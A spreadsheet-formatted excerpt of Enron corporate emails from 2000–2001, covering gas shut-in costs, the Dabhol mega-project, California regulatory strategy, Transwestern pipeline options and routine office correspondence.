I am guessing that you guys have market knowledge of shut-in costs for western Canada.  We have heard all of the typical low price rumors of Rockies shut-ins at a dollar.  I am going to put Steve South and Paul Lucci in charge of presenting a shut-in analysis by field in the Rockies and san juan.  What do I need to have these guys look at in terms of variable costs.  Is it as simple as gathering and processing?  _x000D_
_x000D_
Let me know your thoughts._x000D_
_x000D_
Thanks,_x000D_
Grigsby</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 07:35:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'g..moore@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'stephen.bennett@enron.com', 'adam.stevens@enron.com', 'sarah.wooddy@enron.com', 'shalesh.ganjoo@enron.com', 'a..roberts@enron.com', 'jose.marquez@enron.com', 'william.smith@enron.com'})</t>
  </si>
  <si>
    <t>Vacation Schedule</t>
  </si>
  <si>
    <t>VACATION SCHEDULE_x000D_
 _x000D_
Have a Wonderful Thanksgiving !_x000D_
_x000D_
Kevin</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 04:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>workload</t>
  </si>
  <si>
    <t xml:space="preserve">Mark:  I scheduled a meeting with you at 4:30 pm today to discuss the MG _x000D_
acquisition, in particular, MG London, Inc. (a U.S REGULATED NYMEX clearing _x000D_
member, FCM, CTA).  NO ONE is looking into this from a US regulatory/legal _x000D_
perspective and I think it should be the swap group.  Enron's "regulated" _x000D_
product areas are metals (since MG clears its own trades on the NYMEX/COMEX _x000D_
and has FCM/CTA status) and potentially agriculture if we (some Enron entity) _x000D_
choose to become a regulated "ATOM" (ag trade option merchant).  From a legal _x000D_
perspective, I think we should have a "whitepaper" drafted by Sullivan &amp; _x000D_
Cromwell, and, it should include an analysis of the MG London, Inc. existing _x000D_
situation.  This would tie into the ag regulation.  Also, have you thought _x000D_
about ENA and MG as NYMEX members and whether we keep both designations, _x000D_
whether we move all/part of ENA's existing clearing business to MG (and _x000D_
perhaps eliminate the need for margin/brokering arrangements such as Paribas, _x000D_
etc.) and any other related issues?  For efficiency purposes, Donna Lowry has _x000D_
asked to join us.  Donna and I had a conference call this morning with _x000D_
Justin, Paul, Jon Barrett, Sheila Glover and Trena McFarland to figure out _x000D_
who's on first (with MG)._x000D_
_x000D_
Also, I am attaching an update of my workload.  I have reached the breaking _x000D_
point and I need more help (even with Jason's help on brokerage agreements _x000D_
the new electronic trading platform agreements are reaching multiple _x000D_
proportions with a new request for agreements for ENA, ECT Investments and _x000D_
EnronCredit.com London).  Gareth and Craig Clark want to meet today about the _x000D_
prepay (Delta/Citibank) and I REALLY need help on the Global Finance side._x000D_
_x000D_
See you later.  Sara_x000D_
</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 11:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PIRA's Western Grid Market Forecast - April 2001</t>
  </si>
  <si>
    <t>Attached is PIRA's Western Grid Market Forecast for April 2001._x000D_
_x000D_
Please direct questions regarding this report to Victoria Watkins, Morris_x000D_
Greenberg, Allan Stewart or Alastair Stevenson at (212) 686-6808._x000D_
_x000D_
Please contact John Graziano regarding PIRA report distribution at ext. 341._x000D_
_x000D_
NOTE: Circulation of the "Western Grid Service" outside a Client's licensed_x000D_
distribution area is strictly prohibited. Copyright compliance is enforced._x000D_
Clients that are unsure of their licensed distribution or require an_x000D_
extension of their current license should contact their PIRA sales_x000D_
representative, or email to sales@pira.com._x000D_
_x000D_
PIRA Electricity Group_x000D_
_x000D_
 - westapr-01.pdf</t>
  </si>
  <si>
    <t>Mon, 21 Feb 2000 11:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Mega power status</t>
  </si>
  <si>
    <t xml:space="preserve">You may want to review this for our meetings._x000D_
---------------------- Forwarded by Jane Wilson/ENRON_DEVELOPMENT on _x000D_
02/21/2000 07:43 PM ---------------------------_x000D_
_x000D_
_x000D_
Jane Wilson_x000D_
02/21/2000 07:43 PM_x000D_
To: Mark Schroeder@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Mega power status_x000D_
_x000D_
There may be no advantages for us in this megaproject status other than the _x000D_
privilege of becoming fully regulated.  However, the Ministry is considering _x000D_
us and Ken Lay made big announcements to the press.  After these _x000D_
announcements, I pulled a team together on Dabhol strategy.  The conclusion _x000D_
was that now that we've made our application and annoucement (noone asked _x000D_
me.  See below), we must keep up the pretext of appearing to seek the mega _x000D_
project status to look like we are trying to help  MSEB.  The consensus of _x000D_
the group was that probably the whole idea of megaproject status will bite _x000D_
the dust._x000D_
_x000D_
Unbenownst to me, a number of letters were filed (with the Ministry, with _x000D_
MSEB and with CERC) requesting mega power project status.  A letter was filed _x000D_
with the Central Electricity Regulatory Commission (CERC) requesting that _x000D_
CERC "use its good offices" to obtain this status for Dabhol.  In a public _x000D_
forum -- a panel that I moderated at a conference, Dr. Rao referenced this _x000D_
letter as one filed by a "multinational" corporation that wouldn't have filed _x000D_
it in its own country, improperly asking for the use of influence.  When he _x000D_
sat back down next to me, Dr. Rao leaned over and whispered that it was _x000D_
Enron, that the name was Sandeep Kohli, and that he was certain I didn't know _x000D_
about it.  I subsequently formally requested its withdrawal, much to Rao's _x000D_
relief.  This was Sanjay's idea.  _x000D_
_x000D_
P.S. it's hot in Mumbai now -- about 90 degrees or so in the daytime._x000D_
---------------------- Forwarded by Jane Wilson/ENRON_DEVELOPMENT on _x000D_
02/21/2000 07:37 PM ---------------------------_x000D_
_x000D_
_x000D_
Jane Wilson_x000D_
02/13/2000 12:32 AM_x000D_
To: Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Mega power status_x000D_
_x000D_
Here is the hand out on mega power project that I handed out in our strategy _x000D_
meeting in January._x000D_
_x000D_
_x000D_
Please note that in the Monday, January 24 Business Standard it was reported _x000D_
that the next tranche of mega power projects may get no tax benefits._x000D_
_x000D_
 "The Union power ministry may not offer tax sops to the projects presently _x000D_
under consideration for mega power project status. _x000D_
  Official sources confirmed that the new projects would not be offered _x000D_
benefits like customs duties waiver, offered to the mega projects cleared _x000D_
last year._x000D_
 The only benefit these projects are expected to receive is sale to the Power _x000D_
Trading Corporation (PTC) -- whereby the state risk on independent power _x000D_
producers (IPPs is transferred to PTC.  Such sops do not have a major impact _x000D_
on the project's tariff, as was initially calculated._x000D_
 The power ministry is considereing a proposla to accord mega status to eight _x000D_
projects, including the Dabhol venture in Maharashtra._x000D_
 . . . ._x000D_
 Sources however, said mega project status would onl be granted on the basis _x000D_
of the tariff quoted by the projects under consideration._x000D_
 The Union power ministry has already formed a committee which will analyse _x000D_
the tariffs for these projects so as to accord them the status.  They said _x000D_
that the committee would be examining the tariffs in accordance to similar _x000D_
project cleared by the Central Electricity Authority.  _x000D_
 . . . _x000D_
 Mega power projects are large interstate power venture selling power to more _x000D_
than one state through the Power Trading Corporation._x000D_
 The 18 projects that have been notified as mega power projects get special _x000D_
benefits in terms of the customs duty waiver and will enable te government to _x000D_
obtain competitive tariffs from projects.  These project also get deemed _x000D_
export status wherein domestic equipment suppliers will be entititled to duty _x000D_
drawback and refund of terminal excise duty."_x000D_
_x000D_
I now have the Availability Based Tariff Order (issued prior to my being _x000D_
involved in India) and will analyze it.  This order will apply to mega power _x000D_
projects as you see in the handout.  I want to do a full regulatory analysis _x000D_
for us in the next month.  _x000D_
_x000D_
Please let me know what our current strategic thinking is on the mega project _x000D_
issue.  I still think that this would not be to Enron's advantage.  However, _x000D_
being realistic, something will have to change.  I just don't think _x000D_
submitting ourselves to regulation by the CERC with one buyer the PTC is to _x000D_
our advantage anyway.  With potentially no tax advantages, what are we _x000D_
thinking?  However, as we discussed in the meeting, we must continue the _x000D_
pretext.  What happens if the dog catches the car?_x000D_
_x000D_
On a separte subject, I know you are busy with the refocus of our development _x000D_
efforts, but obviously I would like to spend some time with you with regard _x000D_
to my reassignment to the India region only (at my suggestion, by the way).  _x000D_
Since I'm returning to the US on Thursday night, the 18th, we may have no _x000D_
face time until my return the 28th.  Is that right?_x000D_
_x000D_
Is the therapy couch ready in your office?  From what I hear from my perch in _x000D_
the TERI forum in Agra and Delhi (now Mumbai) there is lots of doom and gloom _x000D_
in the Mumbai office.  Certain resumes are being prepared, and there seems to _x000D_
be a general feeling that Enron will embark on a several-year wrap up/sell _x000D_
down effort.  _x000D_
_x000D_
I am planning to go to the South Asia forum in Kathmandu.  Even with our _x000D_
refocus, it strikes me that the contacts with DOE and Indian embassy and _x000D_
Indian personnel will be most worthwhile.  Let me know if you disagree._x000D_
---------------------- Forwarded by Jane Wilson/ENRON_DEVELOPMENT on _x000D_
02/13/2000 12:12 AM ---------------------------_x000D_
   _x000D_
	enron india_x000D_
	_x000D_
	From:  Wade Cline                           02/11/2000 06:26 AM_x000D_
	_x000D_
_x000D_
To: Jane Wilson/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Mega power status_x000D_
_x000D_
Jane,_x000D_
_x000D_
Please send me via e-mail or fax a copy of the note you put together and _x000D_
presented a few Saturdays ago. This was the note about that had the checklist _x000D_
of items required for a project to be a mega project and had the status of _x000D_
DPC on each item._x000D_
_x000D_
Thanks,_x000D_
Wade_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 08:07:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Project Lists</t>
  </si>
  <si>
    <t>Mark,_x000D_
Please see attached. This is the first one of these that I have completed. Please let me know if I have provided the info you need.  Thanks, Anne_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Taylor, Mark E (Legal)  _x000D_
Sent:	Monday, August  13, 2001 5:08 PM_x000D_
To:	Cook, Mary; Gray, Barbara N.; Greenberg, Mark; Hendry, Brent; Koehler, Anne C.; Leite, Francisco Pinto; Nelson, Cheryl; Sayre, Frank; Shackleton, Sara; Bailey, Susan; Boyd, Samantha; Heard, Marie; Jones, Tana; Panus, Stephanie_x000D_
Subject:	Project Lists_x000D_
_x000D_
If you have not sent me a current project list within the last week, please do so no later than noon tomorrow using the attached format.  _x000D_
_x000D_
 &lt;&lt; File: Project list template.doc &gt;&gt; _x000D_
_x000D_
Mark Taylor_x000D_
Vice President and General Counsel_x000D_
Enron Wholesale Services_x000D_
(713)853-7459</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 12:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Subject: transstatus SPP 01007383 CONFIRMED</t>
  </si>
  <si>
    <t>HTTP/1.1 200_x000D_
Server: Netscape-Enterprise/3.6 SP2_x000D_
Date: Thu, 12 Apr 2001 02:53:06 GMT_x000D_
Content-type: text/x-oasis-csv_x000D_
Connection: close_x000D_
_x000D_
REQUEST_STATUS=200_x000D_
ERROR_MESSAGE=_x000D_
TIME_STAMP=20010411215307PD_x000D_
VERSION=1.4_x000D_
TEMPLATE=transstatus_x000D_
OUTPUT_FORMAT=DATA_x000D_
PRIMARY_PROVIDER_CODE=SPP_x000D_
PRIMARY_PROVIDER_DUNS=959415852_x000D_
RETURN_TZ=PD_x000D_
DATA_ROWS=1_x000D_
COLUMN_HEADERS=CONTINUATION_FLAG,ASSIGNMENT_REF,SELLER_CODE,SELLER_DUNS,CUSTOM_x000D_
ER_CODE,CUSTOMER_DUNS,AFFILIATE_FLAG,PATH_NAME,POINT_OF_RECEIPT,POINT_OF_DELIV_x000D_
ERY,SOURCE,SINK,CAPACITY_REQUESTED,CAPACITY_GRANTED,SERVICE_INCREMENT,TS_CLASS_x000D_
,TS_TYPE,TS_PERIOD,TS_WINDOW,TS_SUBCLASS,NERC_CURTAILMENT_PRIORITY,OTHER_CURTA_x000D_
ILMENT_PRIORITY,START_TIME,STOP_TIME,CEILING_PRICE,OFFER_PRICE,BID_PRICE,PRICE_x000D_
_UNITS,PRECONFIRMED,ANC_SVC_LINK,ANC_SVC_REQ,POSTING_REF,SALE_REF,REQUEST_REF,_x000D_
DEAL_REF,IMPACTED,COMPETING_REQUEST_FLAG,REQ_x000D_
UEST_TYPE,RELATED_REF,NEGOTIATED_PRICE_FLAG,STATUS,STATUS_NOTIFICATION,STATUS__x000D_
COMMENTS,TIME_QUEUED,RESPONSE_TIME_LIMIT,TIME_OF_LAST_UPDATE,PRIMARY_PROVIDER__x000D_
COMMENTS,SELLER_REF,SELLER_COMMENTS,CUSTOMER_COMMENTS,SELLER_NAME,SELLER_PHONE_x000D_
,SELLER_FAX,SELLER_EMAIL,CUSTOMER_NAME,CUSTOMER_PHONE,CUSTOMER_FAX,CUSTOMER_EM_x000D_
AIL,REASSIGNED_REF,REASSIGNED_CAPACITY,REASSIGNED_START_TIME,REASSIGNED_STOP_T_x000D_
IME_x000D_
N,SPP _x000D_
01007383,SPP,959415852,EPMI,848921276,N,CONTROL/HILLTOP,SVR55,HIL345,"CISO","P_x000D_
ACE",12,12,HOURLY,NON-FIRM,POINT_TO_POINT,OFF_PEAK,FIXED,W/O ANCILLARY _x000D_
SRVCS,1,,20010411220000PD,20010412060000PD,3.9000,3.9000,3.9000,MW-HR,Y,SC:(SP_x000D_
P:AR:SPP _x000D_
01003009);,SC:M;,,,,,0,N,ORIGINAL,,,CONFIRMED,MAILTO:mark.guzman@enron.com;,,2_x000D_
0010411194524PD,20010411191500PD,20010411195213PD,,,,,Carolyn _x000D_
Bonari,(775)834-4180,(775)834-4296,sppc.oasis@sppc.com,Don _x000D_
Norman,,(503)464-3740,lester.rawson@enron.com,,,,</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 10:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com'})</t>
  </si>
  <si>
    <t>Strategy</t>
  </si>
  <si>
    <t>I'd like us to take a stab at drafting the California strategy so we can _x000D_
present initial thoughts at the meeting I'm hoping to set up next Wednesday _x000D_
in D.C.  (Discussed under separate e-mail).  To that end, I suggest the _x000D_
following outline for the strategy:_x000D_
_x000D_
What are our specific business interests in California?  Let's be as specific _x000D_
as possible, but limit the list to "hot buttons."   In this regard, Jim _x000D_
Steffes identified "the imposition of price caps in the summer of 2001" as _x000D_
the hot button.  Are there others?  _x000D_
What are the forums we expect will affect our business interests?_x000D_
For each forum, how do we want to posture Enron?  Do we want to be the most _x000D_
aggressive company?  Do we want to act alone?  Do we want to work only in _x000D_
coalitions?  What about IEP?  What will motivate us to act independently?_x000D_
What is our overall strategy?  Do we want to go back to our pre-1999 _x000D_
rhetoric?  We can scream louder than anyone else that California didn't do it _x000D_
right..  Peace will be gone ... should we breach Steve K.'s promise to play _x000D_
nice?  Do we want to tear down AB 1890 or shore it up?  _x000D_
Forum-by-forum identify our:  (a) goals; (b) strategy; (c) what we (Enron) _x000D_
want out of the forum.  For example, re:  the legislature, do we want to _x000D_
identify legislation that we will seek affirmatively?  If not, why not?</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 13:54:08 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Forwards Detail1.xls</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
-----Original Message-----_x000D_
From: Bardal, Chelsea _x000D_
Sent: Monday, October 29, 2001 3:54 PM_x000D_
To: Love, Phillip M._x000D_
Subject: Forwards Detail1.xls_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 01:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>i've realized i'm too old to stay up til 1 on a school night</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 06:00:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Agenda for Friday</t>
  </si>
  <si>
    <t>Thanks._x000D_
_x000D_
We had reasonably good meetings with Ford and GM yesterday (Mike Curry on point for this). GM may be able to bring Delphi and Celanese to the table. Both companies are interested in further discussions. I am meeting with Enron engineers today to have a look at the practical geographic limits for power delivered across the proposed tie (displacement obviously increases the physical limit) to help identify additional target customers._x000D_
_x000D_
Dave_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Tuesday, July 31, 2001 2:56 PM_x000D_
To:	Irvin, Steve_x000D_
Cc:	Williams, Jaime; Forster, David; Schoppe, Tammie_x000D_
Subject:	Agenda for Friday_x000D_
_x000D_
Things I would like to cover on Friday include:_x000D_
_x000D_
(i) Way forward on Tex-Mex and other options_x000D_
(ii) Staffing in Monterrey _x000D_
(iii) Stealth_x000D_
(iv) PRC feedback_x000D_
_x000D_
Thanks_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
Chief Operating Officer_x000D_
Enron Americas_x000D_
Tel:  713 853 3488_x000D_
Fax: 713 646 2308</t>
  </si>
  <si>
    <t>Wed, 5 Sep 2001 08:56:49 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Jim - Attached are two documents.  The IRTF will give you a picture of whta is being done in the region with respect to my direct reports.  The second document reflects the business opportunities that I am currently working on with ENA and various companies.  As always please don't hesitate to call should further discussion be needed. Thanks and sorry for the delay SM_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bellas, Kirsten  _x000D_
Sent:	Wednesday, September 05, 2001 11:50 AM_x000D_
To:	Montovano, Steve_x000D_
Subject:	_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 1 May 2000 02:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: kennecott</t>
  </si>
  <si>
    <t xml:space="preserve">Mark:_x000D_
I would like to talk to you about this._x000D_
carol_x000D_
---------------------- Forwarded by Carol St Clair/HOU/ECT on 05/01/2000 _x000D_
09:31 AM ---------------------------_x000D_
_x000D_
_x000D_
David Forster@ENRON_x000D_
04/28/2000 06:05 PM_x000D_
To: Carol St Clair/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: kennecott  _x000D_
_x000D_
I don't like specifying a time period for termination. I remember we had a _x000D_
lengthy discussion on this with Mark Taylor. I seem to recall that the _x000D_
solution was that we would employ resonable efforts to process the _x000D_
termination request (please confirm with Mark). I don't think they will be _x000D_
happy with three days._x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
_x000D_
Carol St Clair@ECT_x000D_
04/28/2000 01:35 PM_x000D_
To: David Forster/Corp/Enron@Enron_x000D_
cc: Mark Taylor/HOU/ECT@ECT _x000D_
_x000D_
Subject: kennecott_x000D_
_x000D_
David:_x000D_
Here is a draft of the ETA amendment letter that we have been discussing with _x000D_
Kennecott.  It includes my proposed modifications to deal with giving them _x000D_
the termination right which I have highlighted.  The current ETA states that _x000D_
all notices become effective immediately.  I have inserted in my language a 3 _x000D_
day period after we receive a termination notice before it becomes _x000D_
effective.  This creates a difference between Us and our Counterparty's since _x000D_
our termination notice would become effective immediately.  What do you _x000D_
think?  Do we need this 3 day period or are you okay with having their _x000D_
termination notice becoming effective on the date of our receipt?_x000D_
Carol_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 04:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'simon.shih@enron.com'})</t>
  </si>
  <si>
    <t>Presentaion</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Simon Shih/Graphics/Enron on 01/16/2001 _x000D_
12:05 PM ---------------------------_x000D_
From: Simon Shih on 01/16/2001 11:44 AM_x000D_
To: Steven J Kean/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Presentaion_x000D_
_x000D_
_x000D_
_x000D_
This Order_x000D_
_x000D_
Agenda_x000D_
01_x000D_
02_x000D_
03_x000D_
04_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 04:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.miller@enron.com', 'glen.hass@enron.com'})</t>
  </si>
  <si>
    <t>Reply Comments RP00-249</t>
  </si>
  <si>
    <t xml:space="preserve">(I haven't reviewed this yet but will have a chance to this afternoon.)_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 07/10/2000 _x000D_
11:00 AM ---------------------------_x000D_
_x000D_
_x000D_
"Gallagher, Boland &amp; Meiburger" &lt;lwinpisinger@gbmdc.com&gt; on 07/10/2000 _x000D_
11:01:27 AM_x000D_
To: "Susan Scott" &lt;Susan_Scott@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Reply Comments RP00-249_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
 - RP00-249 Reply Comments.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Sep 2000 07:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christine.stokes@enron.com', 'lynn.blair@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'mary.miller@enron.com', 'julia.white@enron.com', 'tony.pryor@enron.com', 'sheila.nacey@enron.com', 'glen.hass@enron.com', 'ramona.betancourt@enron.com', 'michelle.lokay@enron.com', 'lindy.donoho@enron.com', 'danny.mccarty@enron.com'})</t>
  </si>
  <si>
    <t>TW Options update</t>
  </si>
  <si>
    <t xml:space="preserve">Transwestern held its Transport Options Workshop on August 31.   Commercial _x000D_
and regulatory representatives of BP-Amoco, Burlington, Conoco, Coral, _x000D_
Dynegy, Phillips and Reliant attended.  After a brief overview of the _x000D_
proposed filing, TW opened the floor for questions and comments.  Here is a _x000D_
summary of the comments._x000D_
_x000D_
Marketing affiliate concerns.  BP's regulatory representative expressed _x000D_
concern that TW's marketing affiliates would be able to use options to game _x000D_
the system.  In BP's example, since TW and ENA are both Enron companies, ENA _x000D_
could purchase an "out of the money" call option essentially cost free, since _x000D_
its affiliate (TW) would have the ability to buy the option back.  Proceeds _x000D_
from ENA's ability to then "move the market" through the establishment of the _x000D_
long basis position would go directly to Enron's bottom line.  BP suggested _x000D_
that TW's marketing affiliates be banned from purchasing options, or that the _x000D_
marketing affiliate be required to credit 100% of the option proceeds to _x000D_
other shippers.  Although BP admits that Transwestern's prior dealings with _x000D_
ENA have not been suspect, BP fears that TW's filing will set a precedent for _x000D_
other pipelines to offer a similar service.  Since TW will be the first _x000D_
pipeline to offer such services, BP wants TW's program to be as restricted as _x000D_
possible.  Dynegy echoed BP's concern regarding possible affiliate abuse, but _x000D_
rather than shelve the program entirely, Dynegy reiterated an earlier _x000D_
suggestion that Transwestern be required to credit back the difference _x000D_
between the option fee paid by an affiliate and the next highest bidder, if _x000D_
the affiliate's bid exceeds the next highest by a certain percentage.  _x000D_
_x000D_
TW's response was that while actual abuse of an options program by a _x000D_
marketing affiliate may be a legitimate concern, owing to its unassailable _x000D_
record in this area, TW should be entitled to a presumption that it has _x000D_
complied and will continue to comply with Commission policy covering the sale _x000D_
of capacity to marketing affiliates, and was not inclined to voluntarily _x000D_
include any limitations on the options program.  If BP and others have _x000D_
serious concerns regarding the Commission's overall policy on marketing _x000D_
affiliates, those issues should be raised in a separate proceeding that _x000D_
applies to all interstate pipelines._x000D_
_x000D_
Right of first refusal.  Burlington asked whether options would replace the _x000D_
right of first refusal.  TW's  response was that ROFR will still be available _x000D_
pursuant to the terms and conditions of our tariff._x000D_
_x000D_
Negotiated rate.  BP's representative claimed that option contracts will _x000D_
constitute a negotiated rate and that each deal will need to be filed as _x000D_
such.  TW did not respond to this or discuss it further.  However, TW's _x000D_
position at this point is that since the option fee is part of the _x000D_
transportation rate, transportation deals that include the option amendment _x000D_
will only be considered negotiated rate deals if the total rate including the _x000D_
option fee exceeds the maximum transport rate.  _x000D_
_x000D_
Hoarding capacity.  Using the recent large block sale of capacity on El Paso _x000D_
as an example, several customers expressed concern that the options program _x000D_
would make it easier for a shipper to hoard capacity.  It was not clear why _x000D_
some of the workshop participants thought that the sale of options would _x000D_
create more opportunity for hoarding capacity than already exists.  Perhaps _x000D_
because the option fee is a lesser cost than the transport rate for the _x000D_
underlying capacity, their perception was that options would simply make _x000D_
hoarding cheaper and easier.  TW acknowledged that the potential for _x000D_
withholding capacity from the market is one reason for FERC's current policy _x000D_
against reserving capacity for shippers.  Although TW did not commit to _x000D_
placing any limits on the either the quantity of capacity or options for _x000D_
capacity that any one shipper may own, it is possible that FERC may require _x000D_
TW to do so in a final order._x000D_
_x000D_
Our plan is to meet with PG&amp;E and SoCalGas in California the week of _x000D_
September 11 to go over details of the program, and to finalize the FERC _x000D_
filing by mid-September._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 11:12:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tbertges@mrportland.com'})</t>
  </si>
  <si>
    <t>MRI ENERGY</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
TODD BERTGES _x000D_
Recruiter, Energy Staffing Group _x000D_
Management Recruiters of Portland, Inc. _x000D_
Phone: (503) 290-1179 _x000D_
Phone: (800) 979-8701 ext. 1179 _x000D_
Fax: 503-282-4380 _x000D_
E-mail: tbertges@mrportland.com _x000D_
Web: www.mrportland.com/html/energy.htm </t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'8774820206@pagenetmessage.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">Testing.  Sell low and buy high_x000D_
---------------------- Forwarded by Phillip K Allen/HOU/ECT on 01/31/2001 _x000D_
04:51 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Phillip K Allen                           01/12/2001 08:58 AM_x000D_
	_x000D_
_x000D_
To: 8774820206@pagenetmessage.net_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
testing_x000D_
</t>
  </si>
  <si>
    <t>Sat, 30 Sep 2000 02:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.sprich@marriott.com', 'thdiaman@sordoni.com', 'dcatalina@juniper.com', 'clukawski@hitt-gc.com', 'dgioffre@hotmail.com', 'mdorgan@celestica.com', 'jpenney@hollandlessard.com', 'miorii@aol.com', 'wgioffre@aol.com', 'pfarinas@tvsa.com', 'jpgiles@hotmail.com', 'michelle.sautter@ibx.com', 'jverre99@hotmail.com', 'ptrintis@cs.com', 'bwycall@hotmail.com', 'rmalibu@earthlink.net', 'billmagee@mindspring.com', 'dhannum@philipinc.com', 'dhannum@earthlink.net', 'dtaub1@aol.com', 'fatpatde@aol.com', 'cdolan@above.net', 'chris.hannum@ssmgroup.com', 'dukern8@gateway.net', 'gioffrebnftsrvcs@cs.com', 'benjamin.rogers@enron.com', 'jim.rogers@libnet.com', 'rbeste1301@aol.com', 'sncd@erols.com', 'sjs1516@earthlink.com', 'jasgioffre@aol.com', 'lconte@hearst.com', 'gioffrem@aeltus.com'})</t>
  </si>
  <si>
    <t>priceless</t>
  </si>
  <si>
    <t>__________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com._x000D_
_x000D_
Share information about yourself, create your own public profile at_x000D_
http://profiles.msn.com._x000D_
_x000D_
 - kournikovapriceless.jpg</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 08:05:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'w..delainey@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeff.ader@enron.com'})</t>
  </si>
  <si>
    <t>FW: British Petroleum Inquiry about EES Via Frevert</t>
  </si>
  <si>
    <t>Jeff, possible buyer. What are we doing with the NEPool Book - are we selling?_x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Mark  _x000D_
Sent:	Friday, November 30, 2001 7:12 AM_x000D_
To:	Delainey, David W._x000D_
Subject:	FW: British Petroleum Inquiry about EES Via Frevert_x000D_
Importance:	High_x000D_
_x000D_
I appologize, must have missed the "i" when I typed your name yesterday, as a P.S. to this note, Tony has been cleared by Lord John Brown to have these discussions_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Allen, Mark  _x000D_
Sent:	Thursday, November 29, 2001 4:13 PM_x000D_
To:	Delaney, David_x000D_
Cc:	Mann, Michael; Moore, Michael; Blachman, Jeremy_x000D_
Subject:	British Petroleum Inquiry about EES Via Frevert_x000D_
Importance:	High_x000D_
_x000D_
David,_x000D_
Per my phone message, I have been informed through my friend at British Petroleum (Andrew Netemeyer, VP Electric Trading) that there has been an inquiry to Mr Frevert via voice mail by Mr. Tony Fountain (President, BP Energy) about wholesale issues and retail interests of Enron.  They appear to have some issues on the wholesale side to discuss but have significant interest in the retail books of business with EES and wish to discuss these with you asap..Andrew Netemeyer would bring a Mr. Bill Burton in their M&amp;A department into the loop and I beleive they have already had some individuals assigned to due some due diligence if Enron will entertain the interest.  Mr Netemeyer's number is (281) 366-4998, and any assistance I can provide regarding introductions or relationship let me know, they have been considering the expansion of retail gas &amp; power and the timing may be right... _x000D_
Regards, _x000D_
MVA</t>
  </si>
  <si>
    <t>Fri, 27 Apr 2001 09:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susie.wilson@enron.com', 'tom.alonso@enron.com', 'holden.salisbury@enron.com', 'mark.fischer@enron.com', 'portland.shift@enron.com', 'lisa.gang@enron.com', 'stacy.runswick@enron.com'})</t>
  </si>
  <si>
    <t>PV LLH PATH CUT GOING TO REAL TIME</t>
  </si>
  <si>
    <t>We have a month long path LLH PV that has been cut on HE 5 and 6 for Saturday _x000D_
4/28_x000D_
_x000D_
The original path is :_x000D_
_x000D_
TEP@PV-NEVP-CPS-E-SPP-IPC-PAC-SDGE-CISO(T)PVN.GILA/SP15- SDGE@SP15._x000D_
_x000D_
